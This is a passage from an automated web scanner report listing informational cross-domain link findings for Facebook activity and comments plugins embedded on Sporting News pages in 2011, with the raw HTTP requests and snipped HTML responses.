Path:	/plugins/activity.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260

The response contains the following links to other domains:

http://dy.snimg.com/story-image/0/26/185199/31162-106-85.jpg
http://dy.snimg.com/story-image/1/35/185305/31291-106-85.jpg
http://dy.snimg.com/story-image/3/2/185272/31245-106-85.jpg
http://dy.snimg.com/story-image/3/21/185097/30983-106-85.jpg
http://dy.snimg.com/story-image/3/38/184726/30464-106-85.jpg
http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jKEcVPZFk-2.gif
http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css
http://www.sportingnews.com/mlb/story/2011-05-03/twins-white-sox-no-hitter
http://www.sportingnews.com/nba/story/2011-05-03/sporting-news-executive-of-the-year-pat-riley
http://www.sportingnews.com/ncaa-football/story/2011-04-27/post-spring-top-25-lsu-oklahoma-top-rankings
http://www.sportingnews.com/ncaa-football/story/2011-05-02/billboard-off-michigan-highway-takes-aim-at-jim-tressel
http://www.sportingnews.com/nfl/story/2011-05-03/rooney-responds-to-mendenhalls-tweets-about-bin-laden

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

16.43. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/spn.nba/article;pos=bottom;tile=4;sz=728x90;slug=report-celtics-team-bus-robbed-in-miami-in-april;zone=article;story_sport=nba;ord=949852828?
http://dy.snimg.com/story-image/0/26/185199/31162-106-85.jpg
http://dy.snimg.com/story-image/1/35/185305/31291-106-85.jpg
http://dy.snimg.com/story-image/2/49/185222/31175-106-85.jpg
http://dy.snimg.com/story-image/3/2/185272/31245-106-85.jpg
http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jKEcVPZFk-2.gif
http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css
http://www.sportingnews.com/mlb/story/2011-05-03/indians-shin-soo-choo-charged-with-dui
http://www.sportingnews.com/mlb/story/2011-05-03/twins-white-sox-no-hitter
http://www.sportingnews.com/nba/story/2011-05-03/sporting-news-executive-of-the-year-pat-riley
http://www.sportingnews.com/nba/story/2011-05-04/report-celtics-team-bus-robbed-in-miami-in-april
http://www.sportingnews.com/nfl/story/2011-05-03/rooney-responds-to-mendenhalls-tweets-about-bin-laden

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

16.44. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260

The response contains the following links to other domains:

http://dy.snimg.com/story-image/0/26/185199/31162-106-85.jpg
http://dy.snimg.com/story-image/1/35/185305/31291-106-85.jpg
http://dy.snimg.com/story-image/2/49/185222/31175-106-85.jpg
http://dy.snimg.com/story-image/3/21/185097/30983-106-85.jpg
http://dy.snimg.com/story-image/3/38/184726/30464-106-85.jpg
http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jKEcVPZFk-2.gif
http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css
http://www.sportingnews.com/mlb/story/2011-05-03/indians-shin-soo-choo-charged-with-dui
http://www.sportingnews.com/nba/story/2011-05-03/sporting-news-executive-of-the-year-pat-riley
http://www.sportingnews.com/ncaa-football/story/2011-04-27/post-spring-top-25-lsu-oklahoma-top-rankings
http://www.sportingnews.com/ncaa-football/story/2011-05-02/billboard-off-michigan-highway-takes-aim-at-jim-tressel
http://www.sportingnews.com/nfl/story/2011-05-03/rooney-responds-to-mendenhalls-tweets-about-bin-laden

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

16.45. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/spn.mlb/article;pos=bottom;tile=4;sz=728x90;slug=high-school-player-makes-incredible-leap-over-catcher-to-avoid-tag-at-home;zone=article;story_sport=mlb;ord=160470471?
http://dy.snimg.com/story-image/0/26/185199/31162-106-85.jpg
http://dy.snimg.com/story-image/1/35/185305/31291-106-85.jpg
http://dy.snimg.com/story-image/3/21/185097/30983-106-85.jpg
http://dy.snimg.com/story-image/3/38/184726/30464-106-85.jpg
http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jKEcVPZFk-2.gif
http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css
http://www.sportingnews.com/mlb/story/2011-04-21/high-school-player-makes-incredible-leap-over-catcher-to-avoid-tag-at-home
http://www.sportingnews.com/nba/story/2011-05-03/sporting-news-executive-of-the-year-pat-riley
http://www.sportingnews.com/ncaa-football/story/2011-04-27/post-spring-top-25-lsu-oklahoma-top-rankings
http://www.sportingnews.com/ncaa-football/story/2011-05-02/billboard-off-michigan-highway-takes-aim-at-jim-tressel
http://www.sportingnews.com/nfl/story/2011-05-03/rooney-responds-to-mendenhalls-tweets-about-bin-laden

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

16.46. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/comments.php?api_key=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3d35cd15c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffeb4109d%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Faol.sportingnews.com%2Fnfl%2Fstory%2F2011-05-04%2Fathletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter&locale=en_US&numposts=10&sdk=joey&width=650

The response contains the following links to other domains:

http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16357140_10150175027384920
http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16358036_10150175060969920
http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16358894_10150175094164920
http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16359088_10150175101634920
http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16359628_10150175124154920
http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16359722_10150175127474920
http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16360072_10150175141024920
http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16360361_10150175151464920
http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16360789_10150175169889920
http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16361729_10150175203974920
http://profile.ak.fbcdn.net/hprofile-ak-snc4/161180_1177249231_4939893_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/161188_1020937929_5104297_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/161429_100000704624017_7176502_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/186000_831972862_4372260_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/186692_1830128021_6341647_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/187272_100002122115800_7062068_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/187593_100001547816690_2540739_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/195286_100001088242101_5524507_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/195581_1555862837_841847_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/195640_559819104_1920008_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/195666_803749624_3820493_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/203384_789689679_4009078_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211232_1708077046_5678275_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211287_1286867422_6012394_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211995_1440527900_6271125_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/23094_1026664643_4591_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/27410_1501705828_2044_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/27421_100000139735724_4046_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/41644_100000763574061_9403_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/41655_1702633465_9909_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/41774_1675365945_9562_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/49142_1308392513_7533553_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/49146_777698905_4333735_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/49225_1329611005_1636_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/49461_1247709577_2754_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/50095_1231308703_4625795_q.jpg
http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif
http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/kKOeJEnwuz7.css
http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/4wOZW9c83Yr.css
http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/Z6PtFE_aVAz.css
http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/D97gxsfJDCQ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/akOVLqNGOB0.png
http://static.ak.fbcdn.net/rsrc.php/v1/yO/r/O4MC2pFJMzJ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9qdm_pQmTM3.css
http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css
http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif

Request

GET /plugins/comments.php?api_key=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3d35cd15c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffeb4109d%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Faol.sportingnews.com%2Fnfl%2Fstory%2F2011-05-04%2Fathletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter&locale=en_US&numposts=10&sdk=joey&width=650 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?icid=maing-grid7%7Cmain5%7Cdl4%7Csec1_lnk3%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.189.49
X-Cnection: close
Date: Thu, 05 May 2011 11:40:13 GMT
Content-Length: 171395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/D97gxsfJDCQ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/Z6PtFE_aVAz.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/kKOeJEnwuz7.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9qdm_pQmTM3.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/4wOZW9c83Yr.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yO/r/O4MC2pFJMzJ.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
<a class="viewerProfileHref" onclick="return false;" target="_blank" href="#"><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /></a>
...[SNIP]...
</div><img class="throbber img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /><div class="postToProfile hidden_elem">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/wmoppert" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41774_1675365945_9562_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16359088_10150175101634920" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), "c4dbd", event, bagof(null));" rel="nofollow"><abbr title="Wednesday, May 4, 2011 at 4:25pm" data-date="Wed, 04 May 2011 16:25:34 -0700" class="timestamp">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/matthew.oliveira2" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195286_100001088242101_5524507_q.jpg" /></a>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=1708077046" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211232_1708077046_5678275_q.jpg" /></a>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/osbornecruiser" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186000_831972862_4372260_q.jpg" /></a>
...[SNIP]...
<span class="uiMorePagerLoader pam uiBoxWhite topborder fbFeedbackPagerLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></span>
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=100000910578526" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16361729_10150175203974920" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), "c4dbd", event, bagof(null));" rel="nofollow"><abbr title="Wednesday, May 4, 2011 at 7:12pm" data-date="Wed, 04 May 2011 19:12:09 -0700" class="timestamp">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=559819104" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195640_559819104_1920008_q.jpg" /></a>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=1177249231" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/161180_1177249231_4939893_q.jpg" /></a>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="#" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/161429_100000704624017_7176502_q.jpg" /></a>
...[SNIP]...
<span class="uiMorePagerLoader pam uiBoxWhite topborder fbFeedbackPagerLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></span>
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="#" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195581_1555862837_841847_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16360072_10150175141024920" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), "c4dbd", event, bagof(null));" rel="nofollow"><abbr title="Wednesday, May 4, 2011 at 5:38pm" data-date="Wed, 04 May 2011 17:38:56 -0700" class="timestamp">
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=1020937929" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/161188_1020937929_5104297_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16359722_10150175127474920" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), "c4dbd", event, bagof(null));" rel="nofollow"><abbr title="Wednesday, May 4, 2011 at 5:14pm" data-date="Wed, 04 May 2011 17:14:50 -0700" class="timestamp">
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=100001547816690" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187593_100001547816690_2540739_q.jpg" /></a>
...[SNIP]...
<span class="fsm fwn fcg"> .. <img class="star img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/akOVLqNGOB0.png" width="15" height="14" /> Top Commenter .. <a class="uiLinkSubtle" href="http://www.facebook.com/pages/Editor-in-Chief/137829579583400" target="_blank">
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16357140_10150175027384920" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), "c4dbd", event, bagof(null));" rel="nofollow"><abbr title="Wednesday, May 4, 2011 at 2:23pm" data-date="Wed, 04 May 2011 14:23:54 -0700" class="timestamp">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=100002317366719" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /></a>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="#" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203384_789689679_4009078_q.jpg" /></a>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=100000763574061" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41644_100000763574061_9403_q.jpg" /></a>
...[SNIP]...
<span class="uiMorePagerLoader pam uiBoxWhite topborder fbFeedbackPagerLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></span>
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=1231308703" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/50095_1231308703_4625795_q.jpg" /></a>
...[SNIP]...
